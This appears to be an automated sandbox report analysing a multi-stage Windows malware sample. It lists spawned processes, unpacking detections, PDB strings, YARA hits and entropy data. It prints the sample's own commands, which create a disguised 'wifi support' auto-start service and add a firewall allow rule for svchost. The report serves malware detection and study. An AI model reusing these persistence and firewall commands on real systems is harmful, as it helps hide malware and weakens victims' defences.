                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\738C.tmp\738D.tmp\extd.exe C:\Users\user\AppData\Local\Temp\738C.tmp\738D.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeProcess created: C:\Users\user\Desktop\U3E7zMaux2.exe "C:\Users\user\Desktop\U3E7zMaux2.exe"
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D984.exe C:\Users\user\AppData\Local\Temp\D984.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E666.exe C:\Users\user\AppData\Local\Temp\E666.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\7CA1.exe C:\Users\user\AppData\Local\Temp\7CA1.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\86C4.exe C:\Users\user\AppData\Local\Temp\86C4.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8EC4.exe C:\Users\user\AppData\Local\Temp\8EC4.exe
                          Source: C:\Users\user\AppData\Roaming\uufaeeaProcess created: C:\Users\user\AppData\Roaming\uufaeea C:\Users\user\AppData\Roaming\uufaeea
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5756 -ip 5756
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 520
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeProcess created: C:\Users\user\AppData\Local\Temp\E666.exe C:\Users\user\AppData\Local\Temp\E666.exe
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\shayesoq\
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lagavljy.exe" C:\Windows\SysWOW64\shayesoq\
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description shayesoq "wifi internet conection
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start shayesoq
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess created: C:\Users\user\AppData\Local\Temp\8EC4.exe C:\Users\user\AppData\Local\Temp\8EC4.exe
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D984.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeCode function: 21_2_00406A60 lstrcatA,CreateFileA,GetDiskFreeSpaceA,GetLastError,CloseHandle,CloseHandle,FindCloseChangeNotification,GetLastError,CloseHandle,DeleteFileA,GetLastError,
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5416:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6000:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6916:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5560:120:WilError_01
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:5788:64:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1496:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5236:120:WilError_01
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5756
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeCommand line argument: \H
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeCommand line argument: \H
                          Source: 8EC4.exe.7.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 8EC4.exe.7.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 22.0.8EC4.exe.fa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 22.0.8EC4.exe.fa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 22.2.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 22.2.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 22.0.8EC4.exe.fa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 22.0.8EC4.exe.fa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 22.0.8EC4.exe.fa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 22.0.8EC4.exe.fa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 22.0.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 22.0.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager
                          Source: C:\Users\user\AppData\Local\Temp\D984.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                          Source: U3E7zMaux2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdb source: 7801.exe, 7801.exe, 0000002B.00000003.845288263.0000000003030000.00000004.00000001.sdmp, 7801.exe, 0000002B.00000002.955535895.0000000002F70000.00000040.00000001.sdmp
                          Source: Binary string: msvcrt.pdbk source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.769293976.0000000001136000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: shcore.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: advapi32.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: fltLib.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: shell32.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: )C:\daz\yataduweperema14_kehudazoha60\rilowi.pdb source: 86C4.exe, 00000015.00000000.775793365.0000000000413000.00000002.00020000.sdmp, 86C4.exe, 00000015.00000002.797218402.0000000000415000.00000002.00020000.sdmp, 86C4.exe, 00000015.00000002.803177540.000000000080E000.00000004.00000020.sdmp, lagavljy.exe, 00000024.00000002.806723360.0000000000415000.00000002.00020000.sdmp, lagavljy.exe, 00000024.00000000.796164744.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdb86 source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: wimm32.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: -C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdbh source: 7801.exe, 0000002B.00000003.845288263.0000000003030000.00000004.00000001.sdmp, 7801.exe, 0000002B.00000002.955535895.0000000002F70000.00000040.00000001.sdmp
                          Source: Binary string: profapi.pdb*6 source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: profapi.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: D984.exe, 0000000E.00000000.760514198.0000000000413000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.752502381.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000012.00000002.795990218.00000000007B0000.00000002.00020000.sdmp
                          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: el.pdb source: 7801.exe
                          Source: Binary string: sechost.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdbz6 source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: powrprof.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: C:\zoro\veme_81\vujiwoli76 gag\sipowatelunem36\locufiyazed.pdb source: 7CA1.exe, 00000014.00000000.769330269.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: /;C:\topidusas82\zesobuc.pdb source: U3E7zMaux2.exe, 00000000.00000000.652670443.0000000000413000.00000002.00020000.sdmp, U3E7zMaux2.exe, 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp, uufaeea, 0000000B.00000000.744804778.0000000000413000.00000002.00020000.sdmp, uufaeea, 0000000B.00000002.754010402.0000000000413000.00000002.00020000.sdmp, E666.exe, 00000011.00000000.759211933.0000000000413000.00000002.00020000.sdmp, E666.exe, 00000011.00000002.772149051.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: :]WC:\yakon-nabavazolof\masa.pdb source: 7801.exe, 0000002B.00000003.848141187.0000000003200000.00000004.00000001.sdmp, 7801.exe, 0000002B.00000002.982597613.0000000003150000.00000040.00000001.sdmp
                          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: C:\yakon-nabavazolof\masa.pdb source: 7801.exe, 0000002B.00000003.848141187.0000000003200000.00000004.00000001.sdmp, 7801.exe, 0000002B.00000002.982597613.0000000003150000.00000040.00000001.sdmp
                          Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: sechost.pdbk source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: C:\daz\yataduweperema14_kehudazoha60\rilowi.pdb source: 86C4.exe, 00000015.00000000.775793365.0000000000413000.00000002.00020000.sdmp, 86C4.exe, 00000015.00000002.797218402.0000000000415000.00000002.00020000.sdmp, 86C4.exe, 00000015.00000002.803177540.000000000080E000.00000004.00000020.sdmp, lagavljy.exe, 00000024.00000002.806723360.0000000000415000.00000002.00020000.sdmp, lagavljy.exe, 00000024.00000000.796164744.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: fltLib.pdb&6 source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: D984.exe, 0000000E.00000000.760514198.0000000000413000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.752502381.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000012.00000002.795990218.00000000007B0000.00000002.00020000.sdmp
                          Source: Binary string: C:\topidusas82\zesobuc.pdb source: U3E7zMaux2.exe, 00000000.00000000.652670443.0000000000413000.00000002.00020000.sdmp, U3E7zMaux2.exe, 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp, uufaeea, 0000000B.00000000.744804778.0000000000413000.00000002.00020000.sdmp, uufaeea, 0000000B.00000002.754010402.0000000000413000.00000002.00020000.sdmp, E666.exe, 00000011.00000000.759211933.0000000000413000.00000002.00020000.sdmp, E666.exe, 00000011.00000002.772149051.0000000000413000.00000002.00020000.sdmp

                          Data Obfuscation:

                          barindex
                          Detected unpacking (overwrites its own PE header)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeUnpacked PE file: 20.2.7CA1.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeUnpacked PE file: 21.2.86C4.exe.400000.0.unpack
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeUnpacked PE file: 36.2.lagavljy.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeUnpacked PE file: 43.2.7801.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeUnpacked PE file: 43.2.7801.exe.400000.0.unpack
                          Detected unpacking (changes PE section rights)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeUnpacked PE file: 20.2.7CA1.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeUnpacked PE file: 21.2.86C4.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeUnpacked PE file: 36.2.lagavljy.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeUnpacked PE file: 43.2.7801.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Yara detected BatToExe compiled binaryShow sources
                          Source: Yara matchFile source: 00000032.00000002.864947877.0000000000BF0000.00000004.00000040.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002E.00000003.894641410.00000000022C0000.00000004.00000040.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000002.864706939.00000000005F0000.00000004.00000020.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000002.864824644.000000000079A000.00000004.00000020.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000002.864795005.0000000000790000.00000004.00000020.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002E.00000003.894589865.0000000002420000.00000004.00000040.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002E.00000003.894618971.0000000002427000.00000004.00000040.sdmp, type: MEMORY
                          .NET source code contains method to dynamically call methods (often used by packers)Show sources
                          Source: 22.0.8EC4.exe.fa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 22.2.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 22.0.8EC4.exe.fa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 22.0.8EC4.exe.fa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 22.0.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 40.0.8EC4.exe.610000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 40.0.8EC4.exe.610000.9.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 40.2.8EC4.exe.610000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 40.0.8EC4.exe.610000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_00404CE9 push ecx; ret
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_004038B3 push ecx; ret
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_00412EA4 push eax; ret
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_00523C66 push esi; ret
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_00523C01 push esi; ret
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_00533634 push es; iretd
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 1_2_00401880 push esi; iretd
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 1_2_00402E94 push es; iretd
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 1_1_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_2_00401880 push esi; iretd
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_2_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_1_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Local\Temp\D984.exeCode function: 14_2_00412CA4 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeCode function: 17_2_00523C66 push esi; ret
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeCode function: 17_2_00523C01 push esi; ret
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeCode function: 19_2_00401880 push esi; iretd
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeCode function: 19_2_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_004139B0 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00465C53 push ss; retf
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00463EE0 pushad ; ret
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_0046128B push ebx; ret
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00464941 pushfd ; ret
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00464973 pushfd ; ret
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeCode function: 22_2_00FA8508 push 00000028h; retf 0000h
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeCode function: 22_2_00FA764A push esp; ret
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeCode function: 22_2_03194003 push esi; retf
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeCode function: 22_2_032CA7DD push ebp; retf
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeCode function: 22_2_032C0D8C push E86CED43h; retf
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeCode function: 22_2_05992503 push E80A995Eh; ret
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeCode function: 36_2_00463A79 push 0000002Bh; iretd
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeCode function: 36_2_00461283 push ds; ret
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_0040A3DE LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                          Source: 8EC4.exe.7.drStatic PE information: 0xA22A793F [Sun Mar 19 11:55:43 2056 UTC]
                          Source: 8ED5.exe.7.drStatic PE information: section name: .gizi
                          Source: 8ED5.exe.7.drStatic PE information: section name: .bur
                          Source: 8ED5.exe.7.drStatic PE information: section name: .wob
                          Source: 9A02.exe.7.drStatic PE information: section name: .code
                          Source: ACEF.exe.7.drStatic PE information: section name:
                          Source: ACEF.exe.7.drStatic PE information: section name:
                          Source: ACEF.exe.7.drStatic PE information: section name:
                          Source: ACEF.exe.7.drStatic PE information: section name:
                          Source: ACEF.exe.7.drStatic PE information: section name:
                          Source: ACEF.exe.7.drStatic PE information: section name:
                          Source: ACEF.exe.7.drStatic PE information: section name: .T3QbYgM
                          Source: ACEF.exe.7.drStatic PE information: section name: .adata
                          Source: BEB3.exe.7.drStatic PE information: section name: .didata
                          Source: CC60.exe.7.drStatic PE information: section name: .code
                          Source: initial sampleStatic PE information: section where entry point is pointing to: .didata
                          Source: CC60.exe.7.drStatic PE information: real checksum: 0x0 should be: 0x60613
                          Source: ACEF.exe.7.drStatic PE information: real checksum: 0x361362 should be: 0x3775f1
                          Source: 8EC4.exe.7.drStatic PE information: real checksum: 0x0 should be: 0x9011f
                          Source: 9A02.exe.7.drStatic PE information: real checksum: 0x0 should be: 0x5e577
                          Source: initial sampleStatic PE information: section name: .text entropy: 7.2566886804
                          Source: initial sampleStatic PE information: section name: entropy: 7.9969707961
                          Source: initial sampleStatic PE information: section name: entropy: 7.91194455639
                          Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22501727341
                          Source: initial sampleStatic PE information: section name: .T3QbYgM entropy: 7.91938761659
                          Source: initial sampleStatic PE information: section name: .didata entropy: 7.99713235918
                          Source: 8EC4.exe.7.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 8EC4.exe.7.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 22.0.8EC4.exe.fa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 22.0.8EC4.exe.fa0000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 22.2.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
